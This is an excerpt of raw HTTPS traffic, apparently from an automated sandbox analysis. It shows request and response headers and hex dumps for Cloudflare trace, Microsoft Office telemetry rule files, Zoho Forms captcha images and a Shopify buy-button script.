                                                                                                                                                                                              Host: www.cloudflare.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              2024-11-20 20:28:25 UTC332INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:25 GMT
                                                                                                                                                                                              Content-Type: text/plain
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8e5b2fb28bcd443e-EWR
                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                              Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                              2024-11-20 20:28:25 UTC315INData Raw: 31 33 34 0d 0a 66 6c 3d 36 34 39 66 32 31 39 0a 68 3d 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 0a 69 70 3d 38 2e 34 36 2e 31 32 33 2e 37 35 0a 74 73 3d 31 37 33 32 31 33 34 35 30 35 2e 33 36 36 0a 76 69 73 69 74 5f 73 63 68 65 6d 65 3d 68 74 74 70 73 0a 75 61 67 3d 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 41 70 70 6c 65 57 65 62 4b 69 74 2f 35 33 37 2e 33 36 20 28 4b 48 54 4d 4c 2c 20 6c 69 6b 65 20 47 65 63 6b 6f 29 20 43 68 72 6f 6d 65 2f 31 31 37 2e 30 2e 30 2e 30 20 53 61 66 61 72 69 2f 35 33 37 2e 33 36 0a 63 6f 6c 6f 3d 45 57 52 0a 73 6c 69 76 65 72 3d 6e 6f 6e 65 0a 68 74 74 70 3d 68 74 74 70 2f 31 2e 31 0a 6c 6f 63 3d 55 53 0a 74 6c 73 3d 54 4c 53 76
                                                                                                                                                                                              Data Ascii: 134fl=649f219h=www.cloudflare.comip=8.46.123.75ts=1732134505.366visit_scheme=httpsuag=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36colo=EWRsliver=nonehttp=http/1.1loc=UStls=TLSv
                                                                                                                                                                                              2024-11-20 20:28:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              72192.168.2.54979713.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:25 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-20 20:28:25 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:25 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 415
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                              ETag: "0x8DC582BA41997E3"
                                                                                                                                                                                              x-ms-request-id: b82db7f7-b01e-0053-188c-3acdf8000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241120T202825Z-185f5d8b95cwtv72hC1NYC141w0000000ang00000000nur7
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-20 20:28:25 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              73192.168.2.54979813.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:25 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-20 20:28:25 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:25 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 477
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                                              ETag: "0x8DC582BB8CEAC16"
                                                                                                                                                                                              x-ms-request-id: 3c827ba2-d01e-0014-367c-3bed58000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241120T202825Z-178bfbc474btrnf9hC1NYCb80g00000000h000000000sz54
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-20 20:28:25 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              74192.168.2.54979613.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:25 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-20 20:28:25 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:25 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 469
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                              ETag: "0x8DC582BBA701121"
                                                                                                                                                                                              x-ms-request-id: 4a7db69e-a01e-0084-45ec-3a9ccd000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241120T202825Z-185f5d8b95cqnkdjhC1NYCm8w80000000ahg00000000w48n
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-20 20:28:25 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              75192.168.2.54980413.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:25 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-20 20:28:25 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:25 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 464
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                                              ETag: "0x8DC582B97FB6C3C"
                                                                                                                                                                                              x-ms-request-id: 8189730a-201e-0003-216a-3bf85a000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241120T202825Z-185f5d8b95c4vwv8hC1NYCy4v40000000at0000000010cm1
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-20 20:28:25 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              76192.168.2.549809136.143.190.1004431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:25 UTC739OUTGET /static/showcaptcha?digest=1_C_38981b8bddce8f162a418db411f998572c5cedc5527ed5cb91c0d48ae1d4feb63474de35340d2e69db0bcf470182544679866327c1bf1bf70db3eecfa72f2b6c HTTP/1.1
                                                                                                                                                                                              Host: accounts.zoho.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                                                              Referer: https://forms.zohopublic.com/
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              2024-11-20 20:28:26 UTC519INHTTP/1.1 200
                                                                                                                                                                                              Server: ZGS
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:26 GMT
                                                                                                                                                                                              Content-Type: image/png;charset=UTF-8
                                                                                                                                                                                              Content-Length: 2992
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Set-Cookie: zalb_e188bc05fe=8db261d30d9c85a68e92e4f91ec8079a; Path=/; Secure; HttpOnly
                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                              Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                              Cache-Control: post-check=0, pre-check=0
                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                              Content-Language: en-US
                                                                                                                                                                                              Strict-Transport-Security: max-age=63072000
                                                                                                                                                                                              2024-11-20 20:28:26 UTC2992INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 c8 00 00 00 4b 08 02 00 00 00 ba 1e 5f bf 00 00 0b 77 49 44 41 54 78 5e ed 9c 79 50 8e dd 1b c7 1f 4b 96 64 c9 56 c2 6b 2b cb c8 32 12 61 86 28 86 30 18 8c 26 eb 58 4b d9 8a 19 bb 90 8c 7d 1b c4 cf 92 c9 92 66 84 d2 58 c2 cf 36 34 c6 96 25 43 8c 2c d9 42 52 29 25 fd be 9e 4b 67 ee e7 3c db fd a4 bb a7 e7 fd 9d cf 5f 39 d7 75 ce 7d ee 73 7f ef eb 5c d7 b9 9f f7 55 15 0a 04 0a a0 e2 1b 04 82 92 40 08 4b a0 08 42 58 02 45 10 c2 12 28 82 10 96 40 11 84 b0 04 8a 20 84 25 50 04 21 2c 81 22 08 61 09 14 41 08 4b a0 08 42 58 02 45 10 c2 12 28 82 10 96 40 11 84 b0 04 8a 20 84 25 50 04 21 2c 81 22 08 61 09 14 41 08 4b a0 08 42 58 02 45 10 c2 12 28 82 10 96 40 11 84 b0 04 8a 20 84 25 50 04 21 2c 0b e0 d3 a7 4f
                                                                                                                                                                                              Data Ascii: PNGIHDRK_wIDATx^yPKdVk+2a(0&XK}fX64%C,BR)%Kg<_9u}s\U@KBXE(@ %P!,"aAKBXE(@ %P!,"aAKBXE(@ %P!,O


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              77192.168.2.549808199.67.80.864431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:25 UTC644OUTGET /forms/images/warning-info.607d397302b1f344f8d8df1258004046.png HTTP/1.1
                                                                                                                                                                                              Host: static.zohocdn.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                                                              Referer: https://forms.zohopublic.com/
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              2024-11-20 20:28:26 UTC829INHTTP/1.1 200
                                                                                                                                                                                              Server: ZGS
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:26 GMT
                                                                                                                                                                                              Content-Type: image/png
                                                                                                                                                                                              Content-Length: 609
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Set-Cookie: zalb_a944c53744=08c8f5ff8608e249d7426e7dcbd5610c; Path=/; Secure; HttpOnly
                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                              Cache-Control: public, max-age=7776000, immutable
                                                                                                                                                                                              ETag: "795e63fefb59c2bff5f31b157b6d01e9"
                                                                                                                                                                                              Content-Language: en-US
                                                                                                                                                                                              Last-Modified: Fri, 29 Mar 2024 10:00:05 GMT
                                                                                                                                                                                              Access-Control-Expose-Headers: *
                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              strict-transport-security: max-age=15768000
                                                                                                                                                                                              Timing-Allow-Origin: *
                                                                                                                                                                                              x-cache: MISS
                                                                                                                                                                                              nb-request-id: e72a2f5bed5e8a559d3a8bd98cd78574
                                                                                                                                                                                              z-origin-id: sa1-83d08e6db6d945c09e932770a0145309
                                                                                                                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                              Strict-Transport-Security: max-age=64072000; includeSubDomains; preload
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-20 20:28:26 UTC609INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 46 00 00 00 45 08 03 00 00 00 c0 64 60 18 00 00 00 30 50 4c 54 45 47 70 4c e2 55 38 e9 5c 46 e8 5c 46 e9 5c 45 ea 5d 45 ea 5d 45 ef 5f 3f ea 5c 45 ea 5c 45 ff 00 00 ea 5d 43 eb 5b 43 ff 3f 3f ea 5b 47 e9 5c 44 50 56 dc ed 00 00 00 10 74 52 4e 53 00 09 24 50 8f e0 ff 10 63 c3 01 31 40 04 19 a8 e6 64 3c ab 00 00 01 d0 49 44 41 54 78 da d5 98 e9 9a 85 20 08 86 73 2b b7 ec fe ef 76 e6 d8 42 13 21 e9 71 36 7e d5 13 bd 7d 28 29 38 fc 1b 13 52 69 33 ae 66 b4 92 a2 81 31 59 37 5e cd d9 a9 8a e1 c3 c6 c0 a4 e8 1f 43 a2 19 69 33 0f 41 12 20 5a 85 69 b5 a0 34 80 24 0f 99 f5 ee 6c d3 45 64 b2 66 c7 cf 0c 25 6d 9e 4e fa bb 70 a5 db be 91 8a 94 b8 43 48 8f 1d 14 0b 14 7b b8 f0 9f b2 0c 65 11 5c 5a 2e 45 8e 5d 9f
                                                                                                                                                                                              Data Ascii: PNGIHDRFEd`0PLTEGpLU8\F\F\E]E]E_?\E\E]C[C??[G\DPVtRNS$Pc1@d<IDATx s+vB!q6~}()8Ri3f1Y7^Ci3A Zi4$lEdf%mNpCH{e\Z.E]


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              78192.168.2.54980713.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:26 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-20 20:28:26 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:26 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 494
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                              ETag: "0x8DC582BB7010D66"
                                                                                                                                                                                              x-ms-request-id: a1cde93a-f01e-0020-638c-3a956b000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241120T202826Z-1777c6cb754mrj2shC1TEB6k7w0000000a9g000000004er3
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-20 20:28:26 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              79192.168.2.549817185.146.173.204431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:26 UTC558OUTGET /buy-button/latest/buy-button-storefront.min.js HTTP/1.1
                                                                                                                                                                                              Host: sdks.shopifycdn.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                              Referer: https://ambir.com/
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              2024-11-20 20:28:26 UTC1153INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:26 GMT
                                                                                                                                                                                              Content-Type: text/javascript
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                              Link: <https://sdks.shopifycdn.com/buy-button/latest/buy-button-storefront.min.js>; rel="canonical"
                                                                                                                                                                                              Server-Timing: imagery;dur=200.392, imageryFetch;dur=192.716
                                                                                                                                                                                              Timing-Allow-Origin: *
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                              X-Request-Id: 32f2692a-067f-4e82-89b0-00769b60c7e4-1732133355
                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                              Strict-Transport-Security: max-age=15552000; includeSubDomains; preload
                                                                                                                                                                                              X-Dc: gcp-us-central1,gcp-us-east1
                                                                                                                                                                                              Last-Modified: Wed, 20 Nov 2024 20:09:15 GMT
                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                              Age: 1079
                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=29nAaWM8sQnnDP75oiUkRdLUmMKeIT%2Fhz3In0uLK2vVAG3ZkPqqib%2BjCftwskaIP7PS2R6KCvm2DhcPvvTnd6gFNDO4f2OsaqqDPUiDPsoQCLQajcTDV1%2BIiuAgvdWnTDbDQrNE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                              NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                              Server-Timing: cfRequestDuration;dur=20.999908
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8e5b2fbb5ba88c36-EWR
